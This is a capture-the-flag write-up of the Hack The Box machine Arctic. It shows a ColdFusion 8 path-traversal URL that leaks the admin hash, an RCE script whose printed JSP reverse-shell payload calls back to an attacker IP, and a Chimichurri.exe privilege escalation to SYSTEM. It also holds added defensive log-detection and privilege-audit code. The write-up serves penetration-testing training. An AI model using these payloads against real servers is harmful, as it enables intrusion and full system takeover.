Arctic-htb-writeup

0x00 Skills covered in this lab

Skills in this chapter: ColdFusion arbitrary file read vulnerability, hash cracking with john, ColdFusion 8 RCE vulnerability, file transfer techniques, using the Chimichurri.exe exploit tool

Reference: https://www.jgeek.cn/article/66

Reference: https://0xdf.gitlab.io/2020/05/19/htb-arctic.html

0x01 Obtaining user access

1. Get the target machine's IP address: 10.10.10.11

2. Scan for open ports

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

3. Browse the service on port 8500

http://10.10.10.11:8500/

4. Browse the files under the CFIDE directory

5. The service appears to be ColdFusion; combining the information gathered so far, search for keywords

coldfusion directory traversal

6. The first result on the page is a vulnerability entry; open it

https://www.exploit-db.com/exploits/14641

7. Following the notes in it, exploit the vulnerability

http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true

8. Next, crack the hash with john

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo john hash -w /usr/share/wordlists/rockyou.txt

happyday (?)

https://sha1.gromweb.com/?hash=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03

9. At this point the password should log in to the admin backend successfully

10. Based on the ColdFusion 8 banner on the home page, search for related vulnerability information

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit ColdFusion 8
----------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------- ---------------------------------
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection | multiple/webapps/40346.py
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cros | cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm | cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query S | cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?start | cfm/webapps/33168.txt
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | cfm/webapps/16788.rb
ColdFusion MX - Missing Template Cross-Site Scripting | cfm/remote/21548.txt
Adobe ColdFusion 8 - Remote Command Execution (RCE) | cfm/webapps/50057.py
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results


Adobe ColdFusion 8 - Remote Command Execution (RCE) | cfm/webapps/50057.py

11. What caught my attention here is this remote command execution vulnerability

12. Looking at the information in the exploit source, it can generate a shell

# Generate a payload that connects back and spawns a command shell
print("\nGenerating a payload...")
os.system(f'msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -o (unknown).jsp')

# Create a request
request = urllib.request.Request(f'http://{rhost}:{rport}/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/(unknown).jsp%00', data=data)

13. Run the exploit script directly

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 50057.py

Generating a payload...
Payload size: 1496 bytes
Saved as: bedb3bfd29c546859f501ea88661e907.jsp

Priting request...
Content-type: multipart/form-data; boundary=f9b66a2735794d2a8a6427de08828976
Content-length: 1697

--f9b66a2735794d2a8a6427de08828976
Content-Disposition: form-data; name="newfile"; filename="bedb3bfd29c546859f501ea88661e907.txt"
Content-Type: text/plain

<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
class StreamConnector extends Thread
{
InputStream bB;
OutputStream sC;

StreamConnector( InputStream bB, OutputStream sC )
{
this.bB = bB;
this.sC = sC;
}

public void run()
{
BufferedReader eh = null;
BufferedWriter b5D = null;
try
{
eh = new BufferedReader( new InputStreamReader( this.bB ) );
b5D = new BufferedWriter( new OutputStreamWriter( this.sC ) );
char buffer[] = new char[8192];
int length;
while( ( length = eh.read( buffer, 0, buffer.length ) ) > 0 )
{
b5D.write( buffer, 0, length );
b5D.flush();
}
} catch( Exception e ){}
try
{
if( eh != null )
eh.close();
if( b5D != null )
b5D.close();
} catch( Exception e ){}
}
}

try
{
String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
ShellPath = new String("/bin/sh");
} else {
ShellPath = new String("cmd.exe");
}

Socket socket = new Socket( "10.10.14.2", 4444 );
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>

--f9b66a2735794d2a8a6427de08828976--


Sending request and printing response...


<script type="text/javascript">
window.parent.OnUploadCompleted( 0, "/userfiles/file/bedb3bfd29c546859f501ea88661e907.jsp/bedb3bfd29c546859f501ea88661e907.txt", "bedb3bfd29c546859f501ea88661e907.txt", "0" );
</script>


Printing some information for debugging...
lhost: 10.10.14.2
lport: 4444
rhost: 10.10.10.11
rport: 8500
payload: bedb3bfd29c546859f501ea88661e907.jsp

Deleting the payload...

Listening for connection...

Executing the payload...
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49256
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\ColdFusion8\runtime\bin>whomai
whomai

C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis

C:\ColdFusion8\runtime\bin>

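The two request patterns this writeup relies on (the enter.cfm locale traversal in step 7 and the FCKeditor upload.cfm null-byte upload in steps 12 and 13) can be caught in the web server's access log. The detector below is an added example, not part of the original writeup or the exploit script; the log lines are constructed, and the paths and parameter names are the ones shown above.

```python
# Added example (not from the writeup): flag requests matching the two
# ColdFusion 8 patterns used above, the enter.cfm locale traversal and the
# FCKeditor upload.cfm connector with a null byte in CurrentFolder.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines in combined-log style (not real traffic).
SAMPLE_LOG = """\
10.10.14.2 - - [08/Mar/2024:10:01:12 +0200] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 611
10.10.14.2 - - [08/Mar/2024:10:03:40 +0200] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/payload.jsp%00 HTTP/1.1" 200 190
10.10.14.2 - - [08/Mar/2024:10:05:01 +0200] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 2540
10.10.14.2 - - [08/Mar/2024:10:06:22 +0200] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 302 0
"""
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_request(target):
    """Return a finding label for one request target, or None if benign."""
    parts = urlsplit(target)
    path = parts.path.lower()
    # parse_qs decodes once; decode again so double-encoded %2e%2e or %2500
    # still surface as '../' and NUL before the checks below.
    query = {k: [unquote(v) for v in vs]
             for k, vs in parse_qs(parts.query, keep_blank_values=True).items()}
    if path.endswith("/cfide/administrator/enter.cfm"):
        for locale in query.get("locale", []):
            if "../" in locale or "..\\" in locale or "\x00" in locale:
                return "cf8-locale-traversal"
    if path.endswith("/connectors/cfm/upload.cfm"):
        folder = "".join(query.get("CurrentFolder", []))
        if "\x00" in folder or folder.lower().endswith((".jsp", ".cfm")):
            return "cf8-fckeditor-null-byte-upload"
    return None


def scan_log(text):
    """Return (line number, label, target) for every flagged log line."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m:
            label = classify_request(m.group("target"))
            if label:
                findings.append((n, label, m.group("target")))
    return findings
```
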
14. Now read the initial flag

C:\ColdFusion8\runtime\bin>type C:\Users\tolis\Desktop\user.txt
type C:\Users\tolis\Desktop\user.txt
a9021b88f3af397e2f746359b189f143

C:\ColdFusion8\runtime\bin>

0x02 Obtaining SYSTEM access

15. Check the system information

C:\ColdFusion8\runtime\bin>systeminfo
systeminfo

Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45 ��
System Boot Time: 9/3/2024, 5:52:35 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 6.143 MB
Available Physical Memory: 5.042 MB
Virtual Memory: Max Size: 12.285 MB
Virtual Memory: Available: 11.180 MB
Virtual Memory: In Use: 1.105 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11

C:\ColdFusion8\runtime\bin>

16. Check the user information

C:\ColdFusion8\runtime\bin>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

C:\ColdFusion8\runtime\bin>

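As an added example (not from the writeup), the script below parses the systeminfo and whoami /priv output collected in steps 15 and 16 and flags the two conditions a defender would want to see here: no hotfixes installed on the base build, and SeImpersonatePrivilege enabled for the account the ColdFusion service runs as. The excerpts are constructed from the values shown above; adding SeAssignPrimaryTokenPrivilege to the high-risk set is an assumption of this example.

```python
# Added example (not from the writeup): parse the two outputs the writeup
# collects on the target and flag what they expose.
import re

# Constructed excerpts modelled on the writeup's output (not a live capture).
SYSTEMINFO = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 N/A
"""
WHOAMI_PRIV = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""
# Privileges that commonly let a compromised service account obtain a SYSTEM
# token; a web worker such as ColdFusion should not hold them (assumed set).
HIGH_RISK_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}


def parse_systeminfo(text):
    """Return systeminfo's 'Key: value' lines as a dict."""
    info = {}
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z][^:]*?):\s+(.*)$", line)
        if m:
            info[m.group(1).strip()] = m.group(2).strip()
    return info


def parse_privs(text):
    """Return {privilege name: state} from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def assess(systeminfo_text, privs_text):
    """Return findings: no hotfixes installed, high-risk privileges enabled."""
    info, privs = parse_systeminfo(systeminfo_text), parse_privs(privs_text)
    findings = []
    if info.get("Hotfix(s)", "").upper() == "N/A":
        findings.append("no hotfixes installed on build " + info.get("OS Version", "?"))
    for p in sorted(HIGH_RISK_PRIVS & set(privs)):
        if privs[p] == "Enabled":
            findings.append(p + " enabled for the current account")
    return findings
```
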
17. A general-purpose enumeration tool was used here, but because of a library installation problem on my own machine, I could not use it

┌──(kali㉿offsec)-[~/Desktop/tools/Windows-Exploit-Suggester]
└─$ python2 windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2024-03-08-mssb.xls
[*] done


┌──(kali㉿offsec)-[~/Desktop/tools/Windows-Exploit-Suggester]
└─$ python2 windows-exploit-suggester.py --database 2024-03-08-mssb.xls --systeminfo sysinfo-htb-Arctic
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[-] please install and upgrade the python-xlrd library

18. Then, following the walkthrough reports, I learned that the Chimichurri.exe exploit tool is needed here; transfer the exploit tool to the target machine

C:\Users\tolis\Downloads>dir \\10.10.14.2\share
dir \\10.10.14.2\share
Volume in drive \\10.10.14.2\share has no label.
Volume Serial Number is ABCD-EFAA

Directory of \\10.10.14.2\share

25/02/2024 04:16 �� 8.323.072 chisel_1.9.1_linux_arm64
02/02/2024 04:41 �� <DIR> frp_0.43.0_linux_amd64
02/02/2024 04:42 �� <DIR> frp_0.43.0_linux_arm64
23/02/2024 09:51 �� <DIR> htb-portscan
12/11/2023 02:55 �� <DIR> pspy
08/03/2024 11:15 �� <DIR> Windows-Exploit-Suggester
25/02/2024 04:14 �� 9.006.080 chisel_1.9.1_windows_amd64
13/05/2005 11:53 �� 68.608 nc.exe
07/12/2021 02:57 �� 27.136 PrintSpoofer64.exe
08/03/2024 11:23 �� 97.280 Chimichurri.exe
5 File(s) 17.542.656 bytes
5 Dir(s) 0 bytes free

C:\Users\tolis\Downloads>copy \\10.10.14.2\share\Chimichurri.exe .
copy \\10.10.14.2\share\Chimichurri.exe .
1 file(s) copied.

C:\Users\tolis\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5C03-76A8

Directory of C:\Users\tolis\Downloads

09/03/2024 07:23 �� <DIR> .
09/03/2024 07:23 �� <DIR> ..
08/03/2024 11:23 �� 97.280 Chimichurri.exe
07/12/2021 02:57 �� 27.136 PrintSpoofer64.exe
2 File(s) 124.416 bytes
2 Dir(s) 1.433.980.928 bytes free

C:\Users\tolis\Downloads>

19. Exploit the vulnerability and read the final flag

C:\Users\tolis\Downloads>Chimichurri.exe 10.10.14.2 443
Chimichurri.exe 10.10.14.2 443
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
C:\Users\tolis\Downloads>

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49556
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\tolis\Downloads>whoami
whoami
nt authority\system

C:\Users\tolis\Downloads>type C:/Users/Administrator/Desktop/root.txt
type C:/Users/Administrator/Desktop/root.txt
The syntax of the command is incorrect.

C:\Users\tolis\Downloads>cd C:/Users/Administrator/Desktop/
cd C:/Users/Administrator/Desktop/

C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5C03-76A8

Directory of C:\Users\Administrator\Desktop

22/03/2017 09:02 �� <DIR> .
22/03/2017 09:02 �� <DIR> ..
09/03/2024 05:53 �� 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 1.433.980.928 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
8dcb68724658ed191b667da961c6e2b7

C:\Users\Administrator\Desktop>

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/9


https://sh1yan.top/2024/03/08/Arctic-htb-writeup/
Author: shiyan
Published: 8 March 2024